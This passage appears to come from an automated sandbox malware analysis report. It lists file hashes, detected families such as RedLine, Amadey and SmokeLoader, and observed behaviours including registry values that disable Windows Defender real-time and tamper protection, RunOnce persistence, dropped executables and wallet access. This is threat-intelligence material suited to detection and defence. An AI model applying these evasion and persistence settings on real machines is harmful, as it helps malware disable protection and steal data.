SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

memory/2020-77-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-78-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-82-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-86-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2020-87-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-84-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-80-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-76-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-89-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2020-91-0x0000000000400000-0x0000000000433000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:34

Reported

2023-10-10 20:36

Platform

win10v2004-20230915-en

Max time kernel

78s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3D0A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8F9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB38.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FCB0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FDEA.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\185.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3D0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5E3F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\60C1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6381.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\FB38.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
